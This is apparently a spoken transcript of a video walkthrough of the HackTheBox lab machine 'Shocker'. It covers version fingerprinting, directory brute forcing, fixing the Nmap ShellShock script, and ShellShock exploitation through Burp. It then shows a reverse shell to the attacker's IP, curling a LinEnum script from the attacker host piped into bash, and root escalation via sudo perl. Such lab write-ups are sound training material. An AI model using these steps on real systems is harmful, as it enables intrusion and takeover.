What's going on, YouTube? This is IppSec, and we're going to be doing Shocker from HackTheBox. I know, this is an easy box. We should begin the hard boxes starting next week again, but that being said, we're going to do a lot of cool things in this video because I enjoy this box. First off, we're going to get the Ubuntu version based upon the Apache header. Like, is it running Trusty, Xennial, Zesty, Artful, Bionic? I don't know, but the Apache header should be able to tell us that. Then we're going to do a lot of debugging on the Nmap ShellShock script because it doesn't work as advertised all the time. So we're going to find out why, fix it, and learn a little bit of Nmap scripting. Then we'll just pop the box and call it a day. So let's jump in. So let's do the Nmap. So Nmap-sc for default scripts, SV enumerate versions, OA output all formats, and I've created the directory Nmap to keep these in. File name will be initial, and then the IP address of Shocker, which is 10.10.10.56. Already ran it because it takes time, so let's look at the results. We do see port 80 and 2222 is open. There's no real exploitation on this port for this box. However, it leaking this exact version is a pretty bad thing. I know in the intro I said we do it through HTTP, but let's actually do it through this first because this is much more specific than this. And that's because how Ubuntu does things is it generally keeps the same version per distro, like Trusty, Xennial, Zesty, whatever. Xennial has 7.2p2, I believe, for OpenSSH. But then they create updates, and those updates are like for Ubuntu 2.2. So there's probably a for Ubuntu 2.1, for Ubuntu 1, etc., that are patches against this version of SSH. So if we go and Google OpenSSH 7.2p and put that version information on it, we should be able to get the last time this box was updated, or a good guess. So OpenSSH, let's see. Why didn't Launchpad come up? Oh, 7.2p2, I think. Get some exploits here. I don't think it's vulnerable to this. Again, that's just because of how Ubuntu does the patching. 7.2p2 was vulnerable, but Ubuntu has since patched it. So if we go all the way down to this launchpad, we do see OpenSSH 7.2p2, the exact package version of Ubuntu, and it was uploaded on March 16th, 2017. A little bit of a rabbit hole for this box because ShellShock's much older than this. I guess they installed Bash manually, and that's probably to avoid a bunch of kernel exploits and other things for unintended routes. But there you have it. We have this box was probably last updated March 16, 2017. If the server was configured correctly and didn't leak the exact version in the header, you do have this Apache header. And this would only tell you if it's Trusty, Xennial, Zesty, whatever, because we don't have this exact version to say, hey, this is the Ubuntu revision of this Apache package at this version. Hopefully that makes sense. But you can generally get a relatively good idea. So if we go to just like packages.ubuntu.com, and this goes for Red Hat and Windows 2. The Red Hat I did in jail, Windows I think I did in Grandma. But we can search for packages. So if we do Apache 2, and let's start with the oldest, Trusty, we see that is 2471. If we go to Xennial, we see 2418. And that is what our Apache is. So chances are this is a Xennial box. Zesty. Oh crap. Supposed to click here. Go to Zesty, Apache 2. 2425. So you kind of get the idea of how to identify Ubuntu versions just by what Apache version it is. So that's why in a lot of those compliance scans that you hate, and you're like, what? Why do I care that it's just specifying a small version because it's not the exact version? Well, that's why. Especially this. This is relatively bad. Because it's saying, hey, SSH, this is Ubuntu, and last patched March of 2017. So let's get out of that enumeration and begin with a GoBuster against port 80. My GoBuster is saved in /opt GoBuster. I'm going to do a -h to view all the options. I want -u for the target URL or domain, and that'll be HTTP 10.10.10.56, and -w for the word list, which is user share word list. For the sake of time, we'll just do derb small. This is a really small word list, so it'll finish quickly. And we're not going to get anything. And the reason why we're not going to get anything is because of the status codes that we're looking at. If we wanted to, we could say, hey, also show us the status codes that include 403, which means the directory exists, but we're not allowed to access it. And when we do that, we get /CGI-bin/. So when doing directory derbus, you may want to also include just 403 forbiddens, because you may be able to get files inside this directory, but not be able to list them. So if we go to 10.10.10.56/CGI-bin, we just get forbidden, not allowed to access. So CGI-bin is generally when Apache gives something over to like Bash or something, or a different scripting language, I guess. It's hard to explain. Anyways, we're just going to now specify /CGI-bin and some common extensions that we want to brute force with. So it's going to take small.txt and append, let's say, sh and pl. sh is for bash scripts, pl is for Perl. I actually don't know if the file is in this word list because it is so small. It's only about 1,000 lines. So now doing 3,000 requests. And there we go. User.sh. So let's go over to user.sh. And it sends us a file back. If we open up with a text editor, we do see it looks like it executed some bash. And you may be wondering why it did that. And we can dig into that with Burp. So go to Burp, Options, Intercept Server Request, turn Intercept on, refresh the page, go over to Burp. Here's the GET request, and here's what, oh, that's CGI bin. If I was paying attention, I would have saw that. There we go. So here's the GET request, and here's the response. And Apache, it has a header, then a blank line, and then the contents of the text. So if you looked at that notepad, content text plain was at the top because there's the blank line here. So the browser is saying this is text and sh, and it's like, I don't know what to do with that. So it saves it as a file. If we put text plain up there for the request, our browser is going to show us that request. So that is that. The next step is to do ShellShock. And based upon the versions we got previously, ShellShock shouldn't be vulnerable, but because the name is Shocker and there's a CGI script which is often vulnerable to ShellShock if Bash is old enough, we're going to try that. So let's try Nmap. So locate NSE. NSE is Nmap scripting engine, I believe. And I'm just going to grep for ShellShock to see if Nmap has something to detect it. And it does. So let's look at this script. And it gives us sample usage. So copy that. And we will run it. So target is going to be 10.10.10.56. I don't want to do all ports. We just want to do port 80. And it's looking like the URI is specified as /CGI/bin. We want user.sh. And hit enter. Then once this finishes, we should see it is vulnerable to ShellShock. Unfortunately, we do not. And we can dig into exactly what's happening if we set up a HTTP proxy and Burp to redirect. So if we go to the Options tab, go to Proxy Listeners, we can bind to port 8081, request handling, redirect to host to 10.10.10.56, and the port will be 80. So now we're listening on localhost 8081, and everything goes to 10.10.10.56.80. So we can see a web browser says 127.0.0.1, 80.81 CGI bin, and we get forbidden. So that is set up correctly. Let's just change our Nmap script to be 127.0.0.1, and we'll do 80.81, and quickly go over to Burp, turn intercept on, and now we can see all the requests Nmap is making. So we get a GET request, that's fine. I don't know what that one is, not found, SDK. And here we go, we have a ShellShock request. We haven't seen a response back, not found, bad request, hnappy, not found. So it's kind of a mess. It didn't come back all in the same order. So we're going to look at history, go to the CGI bin user.sh, send it over to repeater, and send this. And we'll try to figure out why we're getting a bad request. So looking at this HTTP header, we have a GET on one line, host on this line, user agent. This is the actual ShellShock. And I go over this again in the beep video if you're confused by ShellShock. But we got this line of it doing nothing. And then we got cookie, referral, connection. But I don't know what this line is. So we're just going to remove that because it doesn't have like anything beforehand to tell you what it is. And that may just be confusing a web server. So when we do that, we get that result on the page several times, text plain, and see it's obviously vulnerable. So let's fix that in the Nmap script. So if we do that, locate, and let's edit this and see exactly why that's happening. So scrolling down, we're generating the HTTP request, random equals nil. I'm guessing that may be nothing. I have to see exactly how. Oh, yeah. It's just defining random. So random's nothing. If CMD is nothing, then that. I hate looking at NSC scripts blind. It's not the easiest thing to read, but we got that random string right here. So if command equals nothing, then maybe nil doesn't mean nothing. Because this is saying if command is defined, then execute ShellShock with command. If it's not, generate a random 15-character string and execute the echo. And that's what we saw in Burp. This is a random 15-character string, and then it's saying, hey, if that exists, then it's vulnerable. So we have the command being injected into the header, the user agent, the referral, the cookie, and then nothing. So I'm going to comment that out, and then we're going to run this again. And the thing I commented out was the thing just saying in the header and not specifying any variables. I think Burp is still set to intercept. Nope, intercept is off. But we see now our Nmap is saying it's vulnerable. And again, if we go to HTTP history, click on this user.sh, we don't see it injecting ShellShock into something random. So awesome. Now the only question is, why didn't ls work? Because it was saying, hey, execute the command ls, and it still did nothing. We got a 500 server error. And we shouldn't be. Because, oh, here's it detecting ShellShock's vulnerable, and then here's our ls. So it does a request, says, yes, I'm vulnerable, then ls. Anyways, if we compare the two requests, we have a echo right here, and then it does something again. This, we do not. So let's send it over to repeater and kind of fix this up. So we go back to proxy. We can look at this request. So space echo semicolon. And we don't need an user agent that. We probably don't need it. Just get rid of it here. Cookie should still get passed. And we get a 200 OK, but we don't have any output. So if we do echo bin ls, what do we get? The actual content. So what happened here is without this blank echo, this response, this user.sh, was here. There was no blank line. So this blank line is this echo. And then we put the echo in, and then we execute a command. So that's why we see the output. The server, let's see. Oh, that sucked. If I do set paste, we'll just clean this up. So if it's not clear, without that echo semicolon, this is what the server sees in the response, and it errors because the RFC states between the HTTP header and text, there has to be a blank line. So that's what that echo is doing. Now, the other question is, why do we have to do the full path? Why didn't just ls work? If we did just ls here, it would actually work. If we do sleep 10, oh, maybe not. I thought it would, but we don't have a profile set. But if we did like bash -c for command, or we have to specify bin bash -c, then we don't have to specify full paths because it's going to load the profile and set your path correctly. And that's why that works. So let's fix the Nmap script again to now allow us to do commands. So if we look up here, we have this command here. We want to specify space echo bin bash -c. Now let's run this again and we'll see what we get. And now we have it's vulnerable ShellShock, we got exploit results, and it ran our command ls. So we have a fixed Nmap script, or at least fixed to this actual box. I have to do more testing to see why it's coded the way it is, but I think this is a more reliable way. So now that that's done, we can get a reverse shell in the box and begin popping. So let's go to the reverse shell cheat sheet. Pentest monkey. And we'll just start trying these reverse shells. So, NC LVNP, we'll do 8082. Go to Burp. This is where we're doing our ShellShock. To specify bin bash. We are probably, what's our IP? 10.10.10.14.27. And our IP is 8082. Click go. Don't have a response back here. That's a good sign. And we get a shell. So Python C import, we have to put that, import pty, pty.spawn bin bash. Python doesn't exist. Which Python 3. We do have Python 3, so we'll do that. Import pty, pty spawn bin bash. Not sure why that didn't work. Oh well. It's not too important to get the full reverse shell. Still bothers me. I'm going to type that again just in case I made a typo. Okay. We will go on without a great shell. That's fine. Let's go into our opt. Let's see. Is it LinEnum? Linux privesc. LinEnum.sh. This is the script I want. Again, you can probably just Google this and pull it off of GitHub. Nothing in this directory is coded by me or anything. So python-m simple http server 8083, and now we can curl 10.10.10.56 8083 LinEnum.sh, pipe it over to bash. I curled the wrong IP. Curl 10.10.14 27 8083 LinEnum.sh, pipe it over to bash, and we will begin our lin prenum check. That is done. So let's scroll up and go through it. So the kernel was built 2017, September. So I guess SSH hadn't updated, or we may have been wrong. I don't know. Ubuntu, Xennial. So we got Xennial correct. The host name is Shocker. The user ID is Shelly. And we can look at sudo, and we're allowed to sudo as root with no password and execute Perl. So that's good. Available shells. Nothing looks unique in the cron, but let's begin with that Perl check. So let's go to dev shm so we can write a file. And if we kill this, oh, we can go back in that directory. We're going to write a file because we have this Perl script that does a reverse shell on Pentest Monkey. Oh, it's even using Perl-E, so we don't even have to write a file. So let's see. Back to terminal. Sudo-l. So we can do sudo user bin Perl. I can't. This is why I wish I had my regular shell. It's gonna time out, hopefully. If it doesn't time out, we'll have to kill the shell and get it again. Annoying. So let's kill the shell and get it again. There's that. Yeah, let's just get a new one. Socket, so we're 10.10, 14, 27. Port's going to be 1234. Sec bin bash, that's fine. Cat this. Copy that. Sudo -l user bin Perl-E. That should work. And we get a shell as root. So that is Shocker. And if you also wanted to, you could have just done something like go. Let's see. If we go back to this example, we have it doing Perl-E. This just means run a Perl command. So if we did like Perl-E print hello world, does that. If we wanted a new line, you could do it that way. But that's just running a Perl command. You could do the same thing in a file. Then saying use socket. Actually, let's do something to make it easier to read. How do I copy it? Because it's there. So we can say replace all semicolons with new lines. I thought I did that correctly. There we go. It's been a long morning, I guess. But anyways, let's see. Was it making the call to bash? There we go. We got a Perl command exec, and I'm guessing if we do Perl-E exec who am I, we can actually run shell commands. So if we just did Perl-E, well, sudo user bin Perl-E exec bin bash, it drops us into a root shell. So that is Shocker. Hope you guys enjoyed the video. Take care, and I will see you next time.